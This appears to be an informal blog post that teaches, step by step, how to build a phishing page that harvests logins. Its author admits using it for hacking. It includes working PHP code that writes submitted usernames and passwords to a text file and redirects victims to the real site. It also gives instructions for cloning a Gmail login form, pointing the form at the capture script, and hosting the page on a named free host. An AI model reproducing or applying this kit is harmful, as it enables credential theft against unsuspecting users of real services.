Whats Phishing! Whole process to phish!

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Fake login pagehi! Friends.I was thinking from a long time weather to post this article or not! but i decided to post it after all its highly knowledgeable!  You can use this for any purpose............( infact i too myself use this for hacking ). so her's the process i'm giving you the process! its a lot easy !  i've already given the link to a phishing page created by me in my previous articles!  but what i prefer is " give a man a fish....he will a peaceful night.....teach him to fish and he will eat his whole life"
So instead of giving another phish page i'm teaching u how to create a phish page yourself.

Q:What is phishing? 
Ans: redirecting the victim to a fake page that looks exactly the same as original one to gain access to his details is known as phishing! 

Heres the process:

Select a target website and navigate to their login page.
Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)
You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
Create a PHP file and name it “phish.php”.
Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website. code:

Header("Location: http://www.RealSite.com");

$handle = fopen("list.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");


*in place of { realsite.com } put the name of the site u r hacking.

Now open a notepad and drag this INDEX.HTML to it so that you can view the source code. find the word " <form " You should see a line like this below. if u dont, keep finding untill u see the below line: 

" <form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth" method="post" onsubmit="return(gaia_onLoginSubmit());"> "

My phishing page is bout GMAIL so it looks like above u can create the page for any site still it would look almost similar!
Change the action=to phish.php  and method="post" to method="GET"

Upload this on any web hosting site and then YOU ARE ready! i know this process is a bit complicated so for any help just leave comment! and i assure all questions and queries would be answered!
x10hosting.com ( a recommended free web hosting site )

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